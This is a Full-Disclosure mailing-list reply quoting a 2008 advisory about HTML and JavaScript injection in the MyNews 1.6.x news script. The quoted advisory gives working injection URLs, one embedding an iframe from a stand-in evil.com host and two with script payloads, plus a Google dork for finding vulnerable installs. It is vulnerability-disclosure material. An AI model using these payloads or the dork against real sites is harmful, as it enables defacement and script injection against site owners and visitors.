your 'disclosure' is lame and so is your site. Could you please never email here again<br><br><div class="gmail_quote">On Feb 6, 2008 1:06 PM, SkyOut <<a href="mailto:skyout@gmx.net">skyout@gmx.net</a>> wrote:<br>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">I know its basic, but I am a supporter of FD and therefore<br><a href="http://planetluc.com" target="_blank">planetluc.com</a> has to be<br>
blamed now! I checked their script MyNews in version 1.6.4 today and<br>then some<br>other versions, all are vulnerable to HTML and JS injection.<br><br>--- ADVISORY ---<br><br>----------------------------<br>|| <a href="http://WWW.SMASH-THE-STACK.NET" target="_blank">WWW.SMASH-THE-STACK.NET</a> ||<br>
-----------------------------<br><br>|| ADVISORY: MyNews 1.6.X HTML/JS Injection Vulnerability<br><br>_____________________<br>|| 0x00: ABOUT ME<br>|| 0x01: DATELINE<br>|| 0x02: INFORMATION<br>|| 0x03: EXPLOITATION<br>|| 0x04: GOOGLE DORK<br>
|| 0x05: RISK LEVEL<br>____________________________________________________________<br>____________________________________________________________<br><br>_________________<br>|| 0x00: ABOUT ME<br><br>Author: SkyOut<br>Date: February 2008<br>
Contact: skyout[-at-]smash-the-stack[-dot-]net<br>Website: <a href="http://www.smash-the-stack.net/" target="_blank">http://www.smash-the-stack.net/</a><br><br>_________________<br>|| 0x01: DATELINE<br><br>2008-02-06: Bug found<br>
2008-02-06: Advisory released<br><br>____________________<br>|| 0x02: INFORMATION<br><br>The MyNews script by <a href="http://planetluc.com" target="_blank">planetluc.com</a> in all versions of the 1.6.X tree is<br>vulnerable to HTML and JS injection due to no sanitation of the "hash"<br>
value in combination with the action "admin".<br><br>_____________________<br>|| 0x03: EXPLOITATION<br><br>No exploit is needed to test this vulnerability. You just need a working<br>web browser.<br><br>1: HTML Injection<br>
<br>To make a HTML injectioni, visit the websites main page. The name<br>might differ<br>from the original name "mynews.inc.php", mostly its called<br>"index.php". Now<br>construct a malformed URL as follows:<br>
<br><a href="http://www.example.com/index.php?hash=" target="_blank">http://www.example.com/index.php?hash=</a>"><iframe src=http://<br><a href="http://www.evil.com/" target="_blank">www.evil.com/</a> height=500px width=500px></iframe><!--&do=admin<br>
<br>Of course you can manipulate the values of "height" and "width" like you<br>want to. Do it the way it best fits to your needs!<br><br>2: JavaScript Injection<br><br>JS injection is similar to HTML injection, just that you put a JS code<br>
in the "hash" parameter. Let me show you two examples:<br><br><a href="http://www.example.com/index.php?hash=" target="_blank">http://www.example.com/index.php?hash=</a>"><script>alert(1337);</<br>
script><!--&do=admin<br><br>or<br><br><a href="http://www.example.com/index.php?hash=" target="_blank">http://www.example.com/index.php?hash=</a>"><script>alert("XSS");</<br>script><!--&do=admin<br>
<br>Sometimes using strings doesn't work, so test it first!<br><br>____________________<br>|| 0x04: GOOGLE DORK<br><br>intext:"powered by MyNews 1.6.*"<br><br>___________________<br>|| 0x05: RISK LEVEL<br><br>
- LOW - (1/3) -<br><br><!> Happy Hacking <!><br><br>____________________________________________________________<br>____________________________________________________________<br><br>THE END<br><br>--- ADVISORY ---<br>
<br>Sincerely,<br>SkyOut<br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>
Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br>